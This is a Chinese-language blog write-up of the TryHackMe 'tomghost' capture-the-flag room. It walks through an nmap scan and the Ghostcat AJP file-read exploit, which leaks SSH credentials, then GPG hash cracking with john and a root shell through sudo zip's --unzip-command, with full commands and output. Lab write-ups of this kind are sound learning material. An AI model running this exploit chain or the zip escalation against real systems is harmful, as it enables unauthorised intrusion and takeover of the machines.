
    <!DOCTYPE html>
    <html lang="en"
            
          
    >
    <head>
    <meta charset="utf-8">
    

    

    
    <title>
        tomghost |
        
        hackboy</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CUbuntu%20Mono:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
    
<link rel="stylesheet" href="https://unpkg.com/@fortawesome/fontawesome-free/css/v4-font-face.min.css">

    
<link rel="stylesheet" href="/css/loader.css">

    <meta name="description" content="Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark管理员注意：此房间包含包含脏话的用户名形式的不当内容，应注意教育设置。-黑暗">
<meta property="og:type" content="article">
<meta property="og:title" content="tomghost">
<meta property="og:url" content="http://example.com/2023/08/05/tomghost/index.html">
<meta property="og:site_name" content="hackboy">
<meta property="og:description" content="Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark管理员注意：此房间包含包含脏话的用户名形式的不当内容，应注意教育设置。-黑暗">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/pic/image-20230805122412563.png">
<meta property="article:published_time" content="2023-08-05T04:19:01.000Z">
<meta property="article:modified_time" content="2023-08-05T07:23:44.047Z">
<meta property="article:author" content="honkerZ">
<meta property="article:tag" content="tryhackme">
<meta property="article:tag" content="webshell">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/pic/image-20230805122412563.png">
    
        <link rel="alternate" href="/atom.xml" title="hackboy" type="application/atom+xml">
    
    
        <link rel="shortcut icon" href="/images/favicon.ico">
    
    
        
<link rel="stylesheet" href="https://unpkg.com/typeface-source-code-pro@1.1.13/index.css">

    
    
<link rel="stylesheet" href="/css/style.css">

    
        
<link rel="stylesheet" href="https://unpkg.com/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">

    
    
    
    
    
<script src="https://unpkg.com/pace-js@1.2.4/pace.min.js"></script>

    
        
<link rel="stylesheet" href="https://unpkg.com/wowjs@1.1.3/css/libs/animate.css">

        
<script src="https://unpkg.com/wowjs@1.1.3/dist/wow.min.js"></script>

        <script>
          new WOW({
            offset: 0,
            mobile: true,
            live: false
          }).init();
        </script>
    
<meta name="generator" content="Hexo 6.3.0"></head>

    <body>
    
<div id='loader'>
  <div class="loading-left-bg"></div>
  <div class="loading-right-bg"></div>
  <div class="spinner-box">
    <div class="loading-taichi">
      <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="http://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
      <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff6e6b" />
      <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z" fill="#fd0d00" />
      <path d="M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95" fill="#fd0d00" />
    </svg>
    </div>
    <div class="loading-word">黑客学习...</div>
  </div>
</div>
</div>

<script>
  const endLoading = function() {
    document.body.style.overflow = 'auto';
    document.getElementById('loader').classList.add("loading");
  }
  window.addEventListener('load', endLoading);
  document.getElementById('loader').addEventListener('click', endLoading);
</script>


    <div id="container">
        <div id="wrap">
            <header id="header">
    
        <img data-src="http://lc-PwMydsXe.cn-n1.lcfile.com/XTyRI4cV4aojqFmGA0cQ5GWKmYRxxrmq/1%20%287%29.jpg" data-sizes="auto" alt="tomghost" class="lazyload">
    
    <div id="header-outer" class="outer">
        <div id="header-title" class="inner">
            <div id="logo-wrap">
                
                    
                    
                        <a href="/" id="logo"><h1>tomghost</h1></a>
                    
                
            </div>
            
                
                
            
        </div>
        <div id="header-inner">
            <nav id="main-nav">
                <a id="main-nav-toggle" class="nav-icon"></a>
                
                    <span class="main-nav-link-wrap">
                        <span class="main-nav-icon"></span>
                        <a class="main-nav-link" href="/">Home</a>
                    </span>
                
                    <span class="main-nav-link-wrap">
                        <span class="main-nav-icon"></span>
                        <a class="main-nav-link" href="/archives">Archives</a>
                    </span>
                
            </nav>
            <nav id="sub-nav">
                
                    <a id="nav-rss-link" class="nav-icon" href="/atom.xml"
                       title="RSS Feed"></a>
                
                
            </nav>
            <div id="search-form-wrap">
                <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
            </div>
        </div>
    </div>
</header>

            <div id="content" class="outer">
                <section id="main"><article id="post-tomghost" class="h-entry article article-type-post"
         itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
    <div class="article-inner">
        <div class="article-meta">
            <div class="article-date wow slideInLeft">
    <a href="/2023/08/05/tomghost/" class="article-date-link">
        <time datetime="2023-08-05T04:19:01.000Z"
              itemprop="datePublished">2023-08-05</time>
    </a>
</div>

            
    <div class="article-category wow slideInLeft">
        <a class="article-category-link" href="/categories/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0/">渗透学习</a>
    </div>


        </div>
        <div class="hr-line"></div>
        

        <div class="e-content article-entry" itemprop="articleBody">
            
                <p><em>Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark<br>管理员注意：此房间包含包含脏话的用户名形式的不当内容，应注意教育设置。-黑暗</em></p>
<h2 id="1-扫描端口服务"><a href="#1-扫描端口服务" class="headerlink" title="1.扫描端口服务"></a>1.扫描端口服务</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─<span class="comment"># nmap -sV -vv 10.10.164.145                </span></span><br><span class="line">Starting Nmap <span class="number">7.93</span> ( https://nmap.org ) at <span class="number">2023</span><span class="literal">-08-05</span> <span class="number">12</span>:<span class="number">21</span> CST</span><br><span class="line">NSE: Loaded <span class="number">45</span> scripts <span class="keyword">for</span> scanning.</span><br><span class="line">Initiating Ping Scan at <span class="number">12</span>:<span class="number">21</span></span><br><span class="line">Scanning <span class="number">10.10</span>.<span class="number">164.145</span> [<span class="number">4</span> <span class="type">ports</span>]</span><br><span class="line">Completed Ping Scan at <span class="number">12</span>:<span class="number">21</span>, <span class="number">0.29</span>s elapsed (<span class="number">1</span> total hosts)</span><br><span class="line">Initiating Parallel DNS resolution of <span class="number">1</span> host. at <span class="number">12</span>:<span class="number">21</span></span><br><span class="line">Completed Parallel DNS resolution of <span class="number">1</span> host. at <span class="number">12</span>:<span class="number">21</span>, <span class="number">0.03</span>s elapsed</span><br><span class="line">Initiating SYN Stealth Scan at <span class="number">12</span>:<span class="number">21</span></span><br><span class="line">Scanning <span class="number">10.10</span>.<span class="number">164.145</span> [<span class="number">1000</span> <span class="type">ports</span>]</span><br><span class="line">Discovered open port <span class="number">22</span>/tcp on <span class="number">10.10</span>.<span class="number">164.145</span></span><br><span class="line">Discovered open port <span class="number">8080</span>/tcp on <span class="number">10.10</span>.<span class="number">164.145</span></span><br><span class="line">Discovered open port <span class="number">53</span>/tcp on <span class="number">10.10</span>.<span class="number">164.145</span></span><br><span class="line">Discovered open port <span class="number">8009</span>/tcp on <span class="number">10.10</span>.<span class="number">164.145</span></span><br><span class="line">Completed SYN Stealth Scan at <span class="number">12</span>:<span class="number">21</span>, <span class="number">4.25</span>s elapsed (<span class="number">1000</span> total ports)</span><br><span class="line">Initiating Service scan at <span class="number">12</span>:<span class="number">21</span></span><br><span class="line">Scanning <span class="number">4</span> services on <span class="number">10.10</span>.<span class="number">164.145</span></span><br><span class="line">Completed Service scan at <span class="number">12</span>:<span class="number">21</span>, <span class="number">9.25</span>s elapsed (<span class="number">4</span> services on <span class="number">1</span> host)</span><br><span class="line">NSE: Script scanning <span class="number">10.10</span>.<span class="number">164.145</span>.</span><br><span class="line">NSE: Starting runlevel <span class="number">1</span> (of <span class="number">2</span>) scan.</span><br><span class="line">Initiating NSE at <span class="number">12</span>:<span class="number">21</span></span><br><span class="line">Completed NSE at <span class="number">12</span>:<span class="number">21</span>, <span class="number">1.28</span>s elapsed</span><br><span class="line">NSE: Starting runlevel <span class="number">2</span> (of <span class="number">2</span>) scan.</span><br><span class="line">Initiating NSE at <span class="number">12</span>:<span class="number">21</span></span><br><span class="line">Completed NSE at <span class="number">12</span>:<span class="number">21</span>, <span class="number">1.04</span>s elapsed</span><br><span class="line">Nmap scan report <span class="keyword">for</span> <span class="number">10.10</span>.<span class="number">164.145</span></span><br><span class="line">Host is up, received <span class="built_in">echo</span><span class="literal">-reply</span> ttl <span class="number">63</span> (<span class="number">0.26</span>s latency).</span><br><span class="line">Scanned at <span class="number">2023</span><span class="literal">-08-05</span> <span class="number">12</span>:<span class="number">21</span>:<span class="number">19</span> CST <span class="keyword">for</span> <span class="number">16</span>s</span><br><span class="line">Not shown: <span class="number">996</span> closed tcp ports (reset)</span><br><span class="line">PORT     STATE SERVICE    REASON         VERSION</span><br><span class="line"><span class="number">22</span>/tcp   open  ssh        syn<span class="literal">-ack</span> ttl <span class="number">63</span> OpenSSH <span class="number">7.2</span>p2 Ubuntu <span class="number">4</span>ubuntu2.<span class="number">8</span> (Ubuntu Linux; protocol <span class="number">2.0</span>)</span><br><span class="line"><span class="number">53</span>/tcp   open  tcpwrapped syn<span class="literal">-ack</span> ttl <span class="number">63</span></span><br><span class="line"><span class="number">8009</span>/tcp open  ajp13      syn<span class="literal">-ack</span> ttl <span class="number">63</span> Apache Jserv (Protocol v1.<span class="number">3</span>)</span><br><span class="line"><span class="number">8080</span>/tcp open  http       syn<span class="literal">-ack</span> ttl <span class="number">63</span> Apache Tomcat <span class="number">9.0</span>.<span class="number">30</span></span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Read <span class="keyword">data</span> files from: /usr/bin/../share/nmap</span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: <span class="number">1</span> IP address (<span class="number">1</span> host up) scanned <span class="keyword">in</span> <span class="number">16.63</span> seconds</span><br><span class="line">           Raw packets sent: <span class="number">1148</span> (<span class="number">50.488</span>KB) | Rcvd: <span class="number">1002</span> (<span class="number">40.084</span>KB)</span><br></pre></td></tr></table></figure>

<p>发现使用apache tomact ,查看是否有相关漏洞</p>
<p><img src="/../pic/image-20230805122412563.png" alt="image-20230805122412563"></p>
<p>试试</p>
<h2 id="2-漏洞侵入"><a href="#2-漏洞侵入" class="headerlink" title="2.漏洞侵入"></a>2.漏洞侵入</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[/]</span><br><span class="line">└─<span class="comment"># python2 /usr/share/exploitdb/exploits/multiple/webapps/48143.py 10.10.164.145</span></span><br><span class="line">Getting resource at ajp13://<span class="number">10.10</span>.<span class="number">164.145</span>:<span class="number">8009</span>/asdf</span><br><span class="line"><span class="literal">----------------------------</span></span><br><span class="line">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="line">&lt;!<span class="literal">--</span></span><br><span class="line"> Licensed to the Apache Software Foundation (ASF) under one or more</span><br><span class="line">  contributor license agreements.  See the NOTICE file distributed with</span><br><span class="line">  this work <span class="keyword">for</span> additional information regarding copyright ownership.</span><br><span class="line">  The ASF licenses this file to You under the Apache License, Version <span class="number">2.0</span></span><br><span class="line">  (the <span class="string">&quot;License&quot;</span>); you may not use this file except <span class="keyword">in</span> compliance with</span><br><span class="line">  the License.  You may obtain a <span class="built_in">copy</span> of the License at</span><br><span class="line"></span><br><span class="line">      http://www.apache.org/licenses/LICENSE<span class="literal">-2</span>.<span class="number">0</span></span><br><span class="line"></span><br><span class="line">  Unless required by applicable law or agreed to <span class="keyword">in</span> writing, software</span><br><span class="line">  distributed under the License is distributed on an <span class="string">&quot;AS IS&quot;</span> BASIS,</span><br><span class="line">  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.</span><br><span class="line">  See the License <span class="keyword">for</span> the specific language governing permissions and</span><br><span class="line">  limitations under the License.</span><br><span class="line"><span class="literal">--</span>&gt;</span><br><span class="line">&lt;web<span class="literal">-app</span> xmlns=<span class="string">&quot;http://xmlns.jcp.org/xml/ns/javaee&quot;</span></span><br><span class="line">  xmlns:xsi=<span class="string">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span></span><br><span class="line">  xsi:schemaLocation=<span class="string">&quot;http://xmlns.jcp.org/xml/ns/javaee</span></span><br><span class="line"><span class="string">                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd&quot;</span></span><br><span class="line">  version=<span class="string">&quot;4.0&quot;</span></span><br><span class="line">  metadata<span class="literal">-complete</span>=<span class="string">&quot;true&quot;</span>&gt;</span><br><span class="line"></span><br><span class="line">  &lt;display<span class="literal">-name</span>&gt;Welcome to Tomcat&lt;/display<span class="literal">-name</span>&gt;</span><br><span class="line">  &lt;description&gt;</span><br><span class="line">     Welcome to GhostCat</span><br><span class="line">        skyfuck:<span class="number">8730281</span>lkjlkjdqlksalks</span><br><span class="line">  &lt;/description&gt;</span><br><span class="line"></span><br><span class="line">&lt;/web<span class="literal">-app</span>&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>账号密码：skyfuck:8730281lkjlkjdqlksalks</p>
<p>得到user.txt</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">skyfuck@ubuntu:/home<span class="variable">$</span> <span class="built_in">cd</span> merlin</span><br><span class="line">skyfuck@ubuntu:/home/merlin<span class="variable">$</span> <span class="built_in">ls</span></span><br><span class="line">user.txt</span><br><span class="line">skyfuck@ubuntu:/home/merlin<span class="variable">$</span> <span class="built_in">cat</span> user.txt</span><br><span class="line">THM&#123;GhostCat_1s_so_cr4sy&#125;</span><br></pre></td></tr></table></figure>

<h2 id="3-sudo提权"><a href="#3-sudo提权" class="headerlink" title="3.sudo提权"></a>3.sudo提权</h2><p>破解merlin的密码：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">john <span class="literal">--format</span>=gpg <span class="literal">--wordlist</span>=/usr/share/wordlists/rockyou.txt hash.txt</span><br><span class="line"><span class="keyword">Using</span> default input encoding: UTF-8</span><br><span class="line">Loaded <span class="number">1</span> password hash (gpg, OpenPGP / GnuPG Secret Key [<span class="number">32</span>/<span class="number">64</span>])</span><br><span class="line">Cost <span class="number">1</span> (s2k<span class="literal">-count</span>) is <span class="number">65536</span> <span class="keyword">for</span> all loaded hashes</span><br><span class="line">Cost <span class="number">2</span> (hash algorithm [<span class="number">1</span>:<span class="type">MD5</span> <span class="number">2</span>:<span class="type">SHA1</span> <span class="number">3</span>:<span class="type">RIPEMD160</span> <span class="number">8</span>:<span class="type">SHA256</span> <span class="number">9</span>:<span class="type">SHA384</span> <span class="number">10</span>:<span class="type">SHA512</span> <span class="number">11</span>:<span class="type">SHA224</span>]) is <span class="number">2</span> <span class="keyword">for</span> all loaded hashes</span><br><span class="line">Cost <span class="number">3</span> (cipher algorithm [<span class="number">1</span>:<span class="type">IDEA</span> <span class="number">2</span>:<span class="number">3</span><span class="type">DES</span> <span class="number">3</span>:<span class="type">CAST5</span> <span class="number">4</span>:<span class="type">Blowfish</span> <span class="number">7</span>:<span class="type">AES128</span> <span class="number">8</span>:<span class="type">AES192</span> <span class="number">9</span>:<span class="type">AES256</span> <span class="number">10</span>:<span class="type">Twofish</span> <span class="number">11</span>:<span class="type">Camellia128</span> <span class="number">12</span>:<span class="type">Camellia192</span> <span class="number">13</span>:<span class="type">Camellia256</span>]) is <span class="number">9</span> <span class="keyword">for</span> all loaded hashes</span><br><span class="line">Will run <span class="number">4</span> OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl<span class="literal">-C</span> to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">alexandru        (tryhackme)     </span><br><span class="line"><span class="number">1</span>g <span class="number">0</span>:<span class="number">00</span>:<span class="number">00</span>:<span class="number">00</span> DONE (<span class="number">2023</span><span class="literal">-08-05</span> <span class="number">13</span>:<span class="number">11</span>) <span class="number">12.50</span>g/s <span class="number">13400</span>p/s <span class="number">13400</span>c/s <span class="number">13400</span>C/s theresa..alexandru</span><br><span class="line">Use the <span class="string">&quot;--show&quot;</span> option to display all of the cracked passwords reliably</span><br><span class="line">Session completed. </span><br></pre></td></tr></table></figure>

<p>解出merlin的密码：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">skyfuck@ubuntu:~<span class="variable">$</span> gpg <span class="literal">--import</span> tryhackme.asc</span><br><span class="line">gpg: key C6707170: already <span class="keyword">in</span> secret keyring</span><br><span class="line">gpg: key C6707170: <span class="string">&quot;tryhackme &lt;stuxnet@tryhackme.com&gt;&quot;</span> not changed</span><br><span class="line">gpg: Total number processed: <span class="number">2</span></span><br><span class="line">gpg:              unchanged: <span class="number">1</span></span><br><span class="line">gpg:       secret keys read: <span class="number">1</span></span><br><span class="line">gpg:  secret keys unchanged: <span class="number">1</span></span><br><span class="line">skyfuck@ubuntu:~<span class="variable">$</span> <span class="built_in">ls</span></span><br><span class="line">credential.pgp  tryhackme.asc</span><br><span class="line">skyfuck@ubuntu:~<span class="variable">$</span> gpg <span class="literal">--decrypt</span> credential.pgp</span><br><span class="line"></span><br><span class="line">You need a passphrase to unlock the secret key <span class="keyword">for</span></span><br><span class="line">user: <span class="string">&quot;tryhackme &lt;stuxnet@tryhackme.com&gt;&quot;</span></span><br><span class="line"><span class="number">1024</span><span class="literal">-bit</span> ELG<span class="literal">-E</span> key, ID <span class="number">6184</span>FBCC, created <span class="number">2020</span><span class="literal">-03-11</span> (main key ID C6707170)</span><br><span class="line"></span><br><span class="line">gpg: gpg<span class="literal">-agent</span> is not available <span class="keyword">in</span> this session</span><br><span class="line">gpg: WARNING: cipher algorithm CAST5 not found <span class="keyword">in</span> recipient preferences</span><br><span class="line">gpg: encrypted with <span class="number">1024</span><span class="literal">-bit</span> ELG<span class="literal">-E</span> key, ID <span class="number">6184</span>FBCC, created <span class="number">2020</span><span class="literal">-03-11</span></span><br><span class="line">      <span class="string">&quot;tryhackme &lt;stuxnet@tryhackme.com&gt;&quot;</span></span><br><span class="line">merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j</span><br></pre></td></tr></table></figure>

<p>进入merlin的用户</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">skyfuck@ubuntu:~<span class="variable">$</span> su merlin</span><br><span class="line">Password: </span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">merlin@ubuntu:~<span class="variable">$</span> sudo <span class="literal">-l</span></span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> merlin on ubuntu:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User merlin may run the following commands on ubuntu:</span><br><span class="line">    (root : root) NOPASSWD: /usr/bin/zip</span><br><span class="line">merlin@ubuntu:~<span class="variable">$</span> touch <span class="number">1</span>.txt</span><br><span class="line">merlin@ubuntu:~<span class="variable">$</span> sudo zip <span class="number">1</span>.zip <span class="number">1</span>.txt <span class="literal">-T</span> <span class="literal">--unzip-command</span>=<span class="string">&quot;sh -c ifconfig&quot;</span></span><br><span class="line">  adding: <span class="number">1</span>.txt (stored <span class="number">0</span>%)</span><br><span class="line">eth0      Link encap:Ethernet  HWaddr <span class="number">02</span>:ae:<span class="number">63</span>:<span class="number">5</span>b:<span class="number">54</span>:<span class="number">07</span>  </span><br><span class="line">          inet addr:<span class="number">10.10</span>.<span class="number">164.145</span>  Bcast:<span class="number">10.10</span>.<span class="number">255.255</span>  Mask:<span class="number">255.255</span>.<span class="number">0.0</span></span><br><span class="line">          inet6 addr: fe80::ae:<span class="number">63</span>ff:fe5b:<span class="number">5407</span>/<span class="number">64</span> Scope:Link</span><br><span class="line">          UP BROADCAST RUNNING MULTICAST  MTU:<span class="number">9001</span>  Metric:<span class="number">1</span></span><br><span class="line">          RX packets:<span class="number">3347</span> errors:<span class="number">0</span> dropped:<span class="number">0</span> overruns:<span class="number">0</span> frame:<span class="number">0</span></span><br><span class="line">          TX packets:<span class="number">4283</span> errors:<span class="number">0</span> dropped:<span class="number">0</span> overruns:<span class="number">0</span> carrier:<span class="number">0</span></span><br><span class="line">          collisions:<span class="number">0</span> txqueuelen:<span class="number">1000</span> </span><br><span class="line">          RX bytes:<span class="number">233364</span> (<span class="number">233.3</span> KB)  TX bytes:<span class="number">455002</span> (<span class="number">455.0</span> KB)</span><br><span class="line"></span><br><span class="line">lo        Link encap:Local Loopback  </span><br><span class="line">          inet addr:<span class="number">127.0</span>.<span class="number">0.1</span>  Mask:<span class="number">255.0</span>.<span class="number">0.0</span></span><br><span class="line">          inet6 addr: ::<span class="number">1</span>/<span class="number">128</span> Scope:Host</span><br><span class="line">          UP LOOPBACK RUNNING  MTU:<span class="number">65536</span>  Metric:<span class="number">1</span></span><br><span class="line">          RX packets:<span class="number">0</span> errors:<span class="number">0</span> dropped:<span class="number">0</span> overruns:<span class="number">0</span> frame:<span class="number">0</span></span><br><span class="line">          TX packets:<span class="number">0</span> errors:<span class="number">0</span> dropped:<span class="number">0</span> overruns:<span class="number">0</span> carrier:<span class="number">0</span></span><br><span class="line">          collisions:<span class="number">0</span> txqueuelen:<span class="number">1</span> </span><br><span class="line">          RX bytes:<span class="number">0</span> (<span class="number">0.0</span> B)  TX bytes:<span class="number">0</span> (<span class="number">0.0</span> B)</span><br><span class="line"></span><br><span class="line">test of <span class="number">1</span>.zip OK</span><br><span class="line">merlin@ubuntu:~<span class="variable">$</span> sudo zip <span class="number">1</span>.zip <span class="number">1</span>.txt <span class="literal">-T</span> <span class="literal">--unzip-command</span>=<span class="string">&quot;sh -c /bin/sh&quot;</span></span><br><span class="line">updating: <span class="number">1</span>.txt (stored <span class="number">0</span>%)</span><br><span class="line"><span class="comment"># ls</span></span><br><span class="line"><span class="number">1</span>.txt  <span class="number">1</span>.zip  user.txt  ziazgf1<span class="built_in">h</span></span><br><span class="line"><span class="comment"># cd ../..</span></span><br><span class="line"><span class="comment"># cd rppt</span></span><br><span class="line">/bin/sh: <span class="number">3</span>: <span class="built_in">cd</span>: can<span class="string">&#x27;t cd to rppt</span></span><br><span class="line"><span class="string"># cd root</span></span><br><span class="line"><span class="string"># cat toot.txt</span></span><br><span class="line"><span class="string">cat: toot.txt: No such file or directory</span></span><br><span class="line"><span class="string"># ls</span></span><br><span class="line"><span class="string">root.txt  ufw</span></span><br><span class="line"><span class="string"># cat root.txt</span></span><br><span class="line"><span class="string">THM&#123;Z1P_1S_FAKE&#125;</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure>

<p>相关文档：<a target="_blank" rel="noopener" href="https://blog.csdn.net/YouthBelief/article/details/122166791">linux zip 提权_sudo zip_LuckyCharm~的博客-CSDN博客</a></p>

            
        </div>
        <footer class="article-footer">
            <a data-url="http://example.com/2023/08/05/tomghost/" data-id="clmnr8k0s002pso8g4zsp6ecw" data-title="tomghost"
               class="article-share-link">Share</a>
            
            
            
            
    <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/tryhackme/" rel="tag">tryhackme</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/webshell/" rel="tag">webshell</a></li></ul>


        </footer>
    </div>
    
        
    <nav id="article-nav" class="wow fadeInUp">
        
            <div class="article-nav-link-wrap article-nav-link-left">
                
                    <img data-src="http://lc-PwMydsXe.cn-n1.lcfile.com/VRTQhfANGQcL6GehDTgE7rK59CG5rwrD/1%20%286%29.jpg" data-sizes="auto" alt="githappens"
                         class="lazyload">
                
                <a href="/2023/08/08/githappens/"></a>
                <div class="article-nav-caption">Newer</div>
                <h3 class="article-nav-title">
                    
                        githappens
                    
                </h3>
            </div>
        
        
            <div class="article-nav-link-wrap article-nav-link-right">
                
                    <img data-src="http://lc-PwMydsXe.cn-n1.lcfile.com/EgGBvxIdpDV0HlL3Te2BegMvDFLtLp7H/1%20%289%29.jpg" data-sizes="auto" alt="Mr-Robot-ctf"
                         class="lazyload">
                
                <a href="/2023/08/03/Mr-Robot-ctf/"></a>
                <div class="article-nav-caption">Older</div>
                <h3 class="article-nav-title">
                    
                        Mr-Robot-ctf
                    
                </h3>
            </div>
        
    </nav>


    
</article>











</section>
                
                    <aside id="sidebar">
    <div class="sidebar-wrap wow fadeInRight">
        <div class="sidebar-author">
            <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="honkerZ" class="lazyload">
            <div class="sidebar-author-name">honkerZ</div>
            <div class="sidebar-description">hacking</div>
        </div>
        <div class="sidebar-state">
            <div class="sidebar-state-article">
                <div>Posts</div>
                <div class="sidebar-state-number">18</div>
            </div>
            <div class="sidebar-state-category">
                <div>Categories</div>
                <div class="sidebar-state-number">3</div>
            </div>
            <div class="sidebar-state-tag">
                <div>Tags</div>
                <div class="sidebar-state-number">23</div>
            </div>
        </div>
        <div class="sidebar-social">
            
                <div class=icon-github>
                    <a href=https://github.com/kter123 itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-google>
                    <a href=https://plus.google.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-twitter>
                    <a href=https://twitter.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-facebook>
